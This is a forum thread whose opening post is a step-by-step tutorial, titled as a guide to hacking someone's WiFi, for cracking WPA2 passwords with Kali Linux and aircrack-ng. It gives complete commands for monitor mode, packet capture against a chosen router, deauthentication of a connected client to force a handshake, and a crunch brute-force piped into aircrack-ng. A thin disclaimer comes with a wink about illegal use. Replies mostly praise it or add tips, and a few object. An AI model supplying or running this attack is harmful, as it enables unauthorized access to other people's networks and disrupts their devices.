What's new

Tutorial how to hack someones WiFi password (wpa2)

Sup iM Jeremy

Sup iM Jeremy

Enthusiast
Messages
350
Reaction score
55
Points
160
Sin$
7
Hey Everyone, today i will be showing you how to Crack a WPA2 password, this is for educational purposes only and i'm in no way responsible for how you use this information.
Well to start i'm going to show you how i Crack my own WiFi password and ill show you the soft ware and tools i use i will post links below.

First i would Highly recommend buying a Alfa AWUSO36H Network adapter the reason being most network adapters be it prebuilt into a laptop or some such as netgear network adapters do not work well with the software and will not let you crack any wifi passwords. now some network adapters do work, i do not have a list of which ones do so i would recommend trying yours (if you have one already). but if worst comes to worst Get the Alfa AWUSO36H Network adapter it works great its the one i use and i bought it on eBay for 12 bucks so not to bad.

Next your going to need to download a program called oracle VM virtualbox which you can download at (http://download.cnet.com/VirtualBox/3000-2094_4-10922624.html)

Next your going to need to download Kali Linux (http://www.kali.org/downloads/)
and download according to your operating system (32bit or 64bit)

Now you will have to open up virtual box and install Kali Linux to it, i do not feel like typing a long tutorial on how to install it so here is a link to YouTube on how to get it installed

Once installed if you have the Alfa Network adapter that i was recommending you will have to make 3 easy quick changes in the setting options.

First, click on the settings option in virtual box, go to system, then click on the processor tab, and put a check mark on Enable PAE/NX.

Second, click on settings once again, put a check mark next to "Enable Network Adapter", then for the "attached to" option select "Bridged Adapter" and then select the name of the adapter. and under "advanced" make sure "cable connected" has a check mark.

Third, go to settings once again, go to the "USB Tab" and make sure the 2 boxes have check marks and add the network adapter like so in this video

NOW were ready to begin!! now that everything is all installed and your settings are in tact go ahead and fire up Kali Linux and log on. Note: if you have trouble logging on the default user name is "root" and then the password that you created.

Next, open up the root box.

TIP: in order to open up the Root box, you will notice something that looks like a laptop screen it is to the right of "applications and places" click it and a window will open.

Now we will have to type in a series of codes ill try to be as detailed as possible.

First Code (do not use my quotation marks at the beginning and end of codes)
"airmon-ng start wlan0"

your computer will now enter monitor mode. you will see a couple of things that pop up with it, one should say "network manager" and a code to the left of it

next code will be
"kill Network manager" (use the code to the left instead of typing network manager)
example, "kill 4356"

Next code
"airodump-ng mon0"
1stpicture_zps616d10fc.jpg

  • the card will start listen to networks, wait 'till your essid appear which has to be WPA or WPA2 encoded
2ndpicture_zps0107c9aa.jpg


  • the one in this tutoral is INFINITUMCBA277 so select yours
  • now that you have the MAC address and the ch#
Now this is how the next basic code should look just so you get a little understanting
airodump-ng -c CH# --bssid 'YOURMACADDRESS' -w ESSID mon0 <<<<<. not actual code)

Now this is how the same code will look with your proper information in it.

"airodump-ng -c 6 --bssid 58:98:35:CB:A2:77 -w INFINITUMCBA277 mon0"

Note!
3rdpicture_zpsd8cd4e29.jpg

the -c stands for channel, your channel may be different so change accordingly. and obviously your bssid will be different from this one as well, Essid is the name of your internet connection "Netgear, century link etc...".

  • so now we wait forever for a handshake or we can deauthenticate a client to obtain a handshake
  • in order to do that we must have the MAC of the client:
For your understanding this is the basics of the code
"aireplay-ng -0 20 -a 'YOURMACADDRESS' -c 'CLIENTSMACADDRESS' mon0"

How it should actually look

"aireplay-ng -0 20 -a 58:98:35:CB:A2:77 -c 70: D4:F2:91:AE:67 mon0"
4thpicture_zps3eb10f0e.jpg

Note! The mac of the client i circled in red will always be to the right of your BSSID (again yours will look different)

  • once the user is deauthenticated and reconnect we'll obtain the handshake
  • if the command didn't work, well... try again (if after u did the deauthenticate command noting seems to happend... maybe you are too far from the client 'cause this command goes directly to the client's connection.) :frown:
  • you will see something like: WPA handshake 58:98:35:CB:A2:77
5thpicture_zpsb3ae49d0.jpg


  • so now we use crunch
  • we wil use the *.cap file were the handshake was saved
In order to get to the .cap file you will have to click the computer icon in kali Linux and click on the home tab, there you should see a .cap file in some cases it may say .cap1 .cap2 etc.. drag and drop it to the kali linux desktop.

6thpicture_zps1b7d2a53.jpg


For your understanding this is how your next code is broken down
"crunch 8 8 0123456789 | aircrack-ng -a 2 'HOME-TC-FILE-CAP' -e 'ESSID' -b 'HANDSHAKE' -w -"

this will be the actual code

"crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -"

Note! after typing "-a 2 " just drag and drop the . cap file in there and then continue with the rest of the code.

7thpicture_zpsbc9813b7.jpg



Then you just have to wait for crunch and aircrack-ng to verify each combination.
Now depending on how long and complicated the password is, it can take anywhere from 1 minute to 3 days. (i know, kind of a long time to wait) but thats only if the password is 64 characters long. but if for some reason your locked out of your internet or other reasons it may very well be worth the wait..

Now im going to go over the last code so you can adjust it to your needs this part is important.

Code: "crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -"

  • So we start with the first instruction: crunch is the wordlist generator :tongue:crunch 8 8
    • crunch 8 8
  • Second: the '8 8' is for the length of the word in characters, the first '8' indicates starting length and the second '8' the ending length. So if you want to test your security with 16 characters password you can change to '16 16,' or '8 16.'
    • crunch 8 8 0123456789
  • Third: '0123456789' this is the list of characters to include in the wordlist for a numeric password. note: 75 % of users use numeric passwords. but you can also try something like: '01234567890abcdefghijklf' by using an alphanumeric wordlist the time will increase as this is a brute force method.
  • Note: some passwords have Capital letters so your code could look like this as well 012345abcdefgHIJKLMN!@#$%^&*(). pretty much anything you can use in a password you would want to add to the list. BUT the longer the list, the longer it takes to complete.
    • 0123456789 | aircrack-ng
  • Fourth: this symbol is very important --> | <-- as it indicates the end of instructions for crunch and the new instructions for aircrack-ng.
  • Last but not least: the place were the .cap file is has to be accurate :idea
Well there's a lot of program that do things like this, i just like it better to do it by myself :biggrin:. Well this is it, let me know if you find this post useful.

Thanks again everyone for sticking with me this far haha this will be my first official tutorial so i know the post doesn't look that great, ill try to come back and edit it to pretty it up a bit. Credit too mrmanuelmtz for practicality teaching me how to do this and helping with this tut.

EDIT.
I know this seems a little lengthy and at times is may seem like its not working, there are mainly 3 reasons why this wont work.
1.its your network adapter, most likely not compatible.
2. your typing in the codes wrong, when i first tried this i was missing spaces and letters so its very important to get the codes exact.
3.the wifi password your trying to crack is out of range, if its to far away it will connect, and then disconnect and keep repeating the process, so make sure your not to far away from your router.

Again just as a reminder this is illegal to do to steal someone elses wifi so use at your own risk :wink: i would appreciate any feed back on this and if any of you need help feel free to PM me and ill try my best to help, there are other ways to crack wifi passwords besides my tutorial so when in doubt, google is your best friend. -Sup iM Jeremy

EDIT: if interested in different programs to use to crack wifi passwords visit
http://blackmoreops.wordpress.com/2014/07/08/cracking-wifi-wpawpa2-passwords-using-reaver-wps/ for alternative tutorials
 
Operating System
  1. Windows
ZoZo

ZoZo

Adventure begins where fear ends.
Retired
Beginning of An Odyssey Frame In Gold Bug Finder
Messages
5,136
Reaction score
7,330
Points
1,690
Sin$
7
That's a really nice tutorial man. It'll help out a lot of people. I may just use this one day.
 
Sup iM Jeremy

Sup iM Jeremy

Enthusiast
Messages
350
Reaction score
55
Points
160
Sin$
7
can you make it simpler?
its pretty much as simple as i can make it, try looking at the link i posted at the bottom of the post for a somewhat easier tutoral from another site 
That's a really nice tutorial man. It'll help out a lot of people. I may just use this one day.
Thank you, its my first official post so i wanted to make it the best that i can. its really a simple thing once your familiarize yourself with the program, took me maybe 1 full day to teach myself
 
ApexDesigns7S

ApexDesigns7S

10-24-13
Messages
436
Reaction score
187
Points
115
Sin$
0
I might have to give this a shot a little later, thanks for the share! :smile:
 
imGol2den

imGol2den

Life Goes On!
Messages
1,059
Reaction score
469
Points
165
Sin$
0
You can also pipe john the ripper into aircrack but its very slow.
 
Chotton

Chotton

Computer Specialist
Mythical Veteran Legendary Veteran Fabled Veteran
Messages
4,697
Reaction score
745
Points
715
Sin$
0
I feel like this should be in the Linux tutorials, since it's technically Linux.
 
Sup iM Jeremy

Sup iM Jeremy

Enthusiast
Messages
350
Reaction score
55
Points
160
Sin$
7
I feel like this should be in the Linux tutorials, since it's technically Linux.
yeah but if i posted it there pretty much no one in the windows section would know how to do it because i'm technically using my windows computer on a virtual box
 
alisasoares

alisasoares

Newbie
Messages
0
Reaction score
0
Points
20
Sin$
0
Aircrack is one of the most popular tools for WEP/WPA/WPA2 cracking. The Aircrack-ng suite contains tools to capture packets and handshakes, de-authenticate connected clients and generate traffic and tools to perform brute force and dictionary attacks. Aicrack-ng is an all-in-one suite containing the following tools (among others):
– Aircrack-ng for wireless password cracking
– Aireplay-ng to generate traffic and client de-authentication
– Airodump-ng for packet capturing
– Airbase-ng to configure fake access points
 
x1lover

x1lover

Enthusiast
Messages
188
Reaction score
28
Points
95
Sin$
0
I think this is cool, but very wrong. Wifies are sacred.
also not to mention very illegal. that and it pops up when a new device is connecting to the network with the newer routers it sends you a notification through email which majority of people have notifications on for email on their smartphone and it gives you all of the information to the phone like GPS location, type of phone and mac address for the phone so they just have to take it to the police and you're arrested.
 
Deathinator71

Deathinator71

Enthusiast
Messages
140
Reaction score
71
Points
95
Sin$
0
Interesting but immoral! Are you going to do a tutorial next on how to watch the lady next door on her web cam? :smile:
 
Last edited:
frostbyt

frostbyt

Enthusiast
Messages
40
Reaction score
4
Points
55
Sin$
0
Very interesting, when I was doing wep it was very fast (within mins) back then a big db was needed for wpa and whatnot and the brute attack would take more then days. I assume we've got around this. I'm a bit surprised to be honest but all the same great tutorial :smile:
 
Top Bottom
Login
Register